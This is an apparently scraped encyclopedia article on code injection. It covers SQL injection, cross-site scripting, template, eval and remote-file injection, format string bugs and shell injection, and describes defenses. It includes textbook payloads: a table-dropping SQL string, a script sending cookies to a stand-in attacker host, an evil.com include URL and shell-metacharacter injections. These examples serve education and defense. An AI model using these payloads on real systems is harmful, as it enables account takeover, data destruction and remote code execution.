Code injection is acomputer security exploit where aprogram fails to correctly process external data, such as user input, causing it to interpret the data as executable commands. Anattacker using this method "injects"code into the program while it is running. Successful exploitation of a code injection vulnerability can result indata breaches, access to restricted or criticalcomputer systems, and the spread ofmalware.
Code injectionvulnerabilities occur when an application sends untrusted data to aninterpreter, which then executes the injected text as code. Injection flaws are often found in services like Structured Query Language (SQL) databases, Extensible Markup Language (XML) parsers,operating system commands, Simple Mail Transfer Protocol (SMTP) headers, and other programarguments. Injection flaws can be identified throughsource code examination,[1]Static analysis, or dynamic testing methods such asfuzzing.[2]
There are numerous types of code injection vulnerabilities, but most are errors in interpretation—they treat benign user input as code or fail to distinguish input from system commands. Many examples of interpretation errors can exist outside of computer science, such as the comedy routine"Who's on First?". Code injection can be used maliciously for many purposes, including:
Code injections that target theInternet of Things could also lead to severe consequences such asdata breaches and service disruption.[3]
Code injections can occur on any type of program running with aninterpreter. Doing this is trivial to most, and one of the primary reasons why server software is kept away from users. An example of how you can see code injection first-hand is to use yourbrowser's developer tools.
Code injection vulnerabilities are recorded by the National Institute of Standards and Technology(NIST) in the National Vulnerability Database (NVD) asCWE-94. Code injection peaked in 2008 at 5.66% as a percentage of all recorded vulnerabilities.[4]
Code injection may be done with good intentions. For example, changing or tweaking the behavior of a program or system through code injection can cause the system to behave in a certain way without malicious intent.[5][6] Code injection could, for example:
Some users may unsuspectingly perform code injection because the input they provided to a program was not considered by those who originally developed the system. For example:
Another benign use of code injection is the discovery of injection flaws to find and fix vulnerabilities. This is known as apenetration test.
To prevent code injection problems, the person could use secure input and output handling strategies, such as:
htmlspecialchars()
function to escape special characters for safe output of text in HTML and themysqli::real_escape_string()
function to isolate data which will be included in anSQL request can protect against SQL injection.HttpOnly
flag forHTTP cookies. When this flag is set, it does not allow client-side script interaction with cookies, thereby preventing certainXSS attacks.[10]The solutions described above deal primarily with web-based injection of HTML or script code into a server-side application. Other approaches must be taken, however, when dealing with injections of user code on a user-operated machine, which often results in privilege elevation attacks. Some approaches that are used to detect and isolate managed and unmanaged code injections are:
AnSQL injection takes advantage ofSQL syntax to inject malicious commands that can read or modify a database or compromise the meaning of the original query.[13]
For example, consider a web page that has twotext fields which allow users to enter a username and a password. The code behind the page will generate anSQL query to check the password against the list of user names:
SELECTUserList.UsernameFROMUserListWHEREUserList.Username='Username'ANDUserList.Password='Password'
If this query returns any rows, then access is granted. However, if the malicious user enters a valid Username and injects some valid code "('Password' OR '1'='1')
in the Password field, then the resulting query will look like this:
SELECTUserList.UsernameFROMUserListWHEREUserList.Username='Username'ANDUserList.Password='Password'OR'1'='1'
In the example above, "Password" is assumed to be blank or some innocuous string. "'1'='1'
" will always be true and many rows will be returned, thereby allowing access.
The technique may be refined to allow multiple statements to run or even to load up and run external programs.
Assume a query with the following format:
SELECTUser.UserIDFROMUserWHEREUser.UserID=' " + UserID + " 'ANDUser.Pwd=' " + Password + " '
If an adversary has the following for inputs:
UserID: ';DROP TABLE User; --'
Password: 'OR"='
then the query will be parsed as:
SELECTUser.UserIDFROMUserWHEREUser.UserID='';DROPTABLEUser;--'AND Pwd = ''OR"='
The resultingUser
table will be removed from the database. This occurs because the;
symbol signifies the end of one command and the start of a new one.--
signifies the start of a comment.
Code injection is the malicious injection or introduction of code into an application. Someweb servers have aguestbook script, which accepts small messages from users and typically receives messages such as:
Very nice site!
However, a malicious person may know of a code injection vulnerability in the guestbook and enter a message such as:
Nice site, I think I'll take it.<script>window.location="https://some_attacker/evilcgi/cookie.cgi?steal="+escape(document.cookie)</script>
If another user views the page, then the injected code will be executed. This code can allow the attacker to impersonate another user. However, this same software bug can be accidentally triggered by an unassuming user, which will cause the website to display bad HTML code.
HTML and script injection are popular subjects, commonly termed "cross-site scripting" or "XSS". XSS refers to an injection flaw whereby user input to a web script or something along such lines is placed into the output HTML without being checked for HTML code or scripting.
Many of these problems are related to erroneous assumptions of what input data is possible or the effects of special data.[14]
Template engines are often used in modernweb applications to display dynamic data. However, trusting non-validated user data can frequently lead to critical vulnerabilities[15] such as server-side Side Template Injections. While this vulnerability is similar tocross-site scripting, template injection can be leveraged to execute code on the web server rather than in a visitor's browser. It abuses a common workflow of web applications, which often use user inputs and templates to render a web page. The example below shows the concept. Here the template{{visitor_name}}
is replaced with data during the rendering process.
Hello {{visitor_name}}
An attacker can use this workflow to inject code into the rendering pipeline by providing a maliciousvisitor_name
. Depending on the implementation of the web application, he could choose to inject{{7*'7'}}
which the renderer could resolve toHello 7777777
. Note that the actual web server has evaluated the malicious code and therefore could be vulnerable toremote code execution.
Aneval()
injection vulnerability occurs when an attacker can control all or part of an input string that is fed into aneval()
function call.[16]
$myvar='somevalue';$x=$_GET['arg'];eval('$myvar = '.$x.';');
The argument of "eval
" will be processed asPHP, so additional commands can be appended. For example, if "arg" is set to "10;system('/bin/echo uh-oh')
", additional code is run which executes a program on the server, in this case "/bin/echo
".
PHP allowsserialization anddeserialization of wholeobjects. If an untrusted input is allowed into the deserialization function, it is possible to overwrite existing classes in the program and execute malicious attacks.[17] Such an attack onJoomla was found in 2013.[18]
Consider thisPHP program (which includes a file specified by request):
<?php$color='blue';if(isset($_GET['color']))$color=$_GET['color'];require($color.'.php');
The example expects a color to be provided, while attackers might provideCOLOR=http://evil.com/exploit
causing PHP to load the remote file.
Format string bugs appear most commonly when a programmer wishes to print a string containing user-supplied data. The programmer may mistakenly writeprintf(buffer)
instead ofprintf("%s", buffer)
. The first version interpretsbuffer
as a format string and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended. Consider the following shortC program that has a local variable chararraypassword
which holds a password; the program asks the user for an integer and a string, then echoes out the user-provided string.
charuser_input[100];intint_in;charpassword[10]="Password1";printf("Enter an integer\n");scanf("%d",&int_in);printf("Please enter a string\n");fgets(user_input,sizeof(user_input),stdin);printf(user_input);// Safe version is: printf("%s", user_input);printf("\n");return0;
If the user input is filled with a list of format specifiers, such as%s%s%s%s%s%s%s%s
, thenprintf()
will start reading from thestack. Eventually, one of the%s
format specifiers will access the address ofpassword
, which is on the stack, and printPassword1
to the screen.
Shell injection (or command injection[19]) is named afterUNIX shells but applies to most systems that allow software to programmatically execute acommand line. Here is an example vulnerabletcsh script:
!/bin/tcshcheck arg outputs it matchesifarg is oneif($1== 1)echoit matches
If the above is stored in the executable file./check
, the shell command./check " 1 ) evil"
will attempt to execute the injected shell commandevil
instead of comparing the argument with the constant one. Here, the code under attack is the code that is trying to check the parameter, the very code that might have been trying to validate the parameter to defend against an attack.[20]
Any function that can be used to compose and run a shell command is a potential vehicle for launching a shell injection attack. Among these aresystem()
,StartProcess()
, andSystem.Diagnostics.Process.Start()
.
Client-server systems such asweb browser interaction withweb servers are potentially vulnerable to shell injection. Consider the following short PHP program that can run on a web server to run an external program calledfunnytext
to replace a word the user sent with some other word.
<?phppassthru("/bin/funnytext ".$_GET['USER_INPUT']);
Thepassthru
function in the above program composes a shell command that is then executed by the web server. Since part of the command it composes is taken from theURL provided by the web browser, this allows theURL to inject malicious shell commands. One can inject code into this program in several ways by exploiting the syntax of various shell features (this list is not exhaustive):[21]
Shell feature | USER_INPUT value | Resulting shell command | Explanation |
---|---|---|---|
Sequential execution | ; malicious_command | /bin/funnytext ; malicious_command | Executesfunnytext , then executesmalicious_command . |
Pipelines | | malicious_command | /bin/funnytext | malicious_command | Sends the output offunnytext as input tomalicious_command . |
Command substitution | `malicious_command` | /bin/funnytext `malicious_command` | Sends the output ofmalicious_command as arguments tofunnytext . |
Command substitution | $(malicious_command) | /bin/funnytext $(malicious_command) | Sends the output ofmalicious_command as arguments tofunnytext . |
AND list | && malicious_command | /bin/funnytext && malicious_command | Executesmalicious_command ifffunnytext returns an exit status of 0 (success). |
OR list | || malicious_command | /bin/funnytext || malicious_command | Executesmalicious_command ifffunnytext returns a nonzero exit status (error). |
Output redirection | > ~/.bashrc | /bin/funnytext > ~/.bashrc | Overwrites the contents the.bashrc file with the output offunnytext . |
Input redirection | < ~/.bashrc | /bin/funnytext < ~/.bashrc | Sends the contents of the.bashrc file as input tofunnytext . |
Some languages offer functions to properly escape or quote strings that are used to construct shell commands:
However, this still puts the burden on programmers to know/learn about these functions and to remember to make use of them every time they use shell commands. In addition to using these functions, validating or sanitizing the user input is also recommended.
A safer alternative is to useAPIs that execute external programs directly rather than through a shell, thus preventing the possibility of shell injection. However, theseAPIs tend to not support various convenience features of shells and/or to be more cumbersome/verbose compared to concise shell syntax.
Benevolent use of code injection occurs when a user changes the behaviour of a program to meet system requirements.
{{cite web}}
:Check|url=
value (help)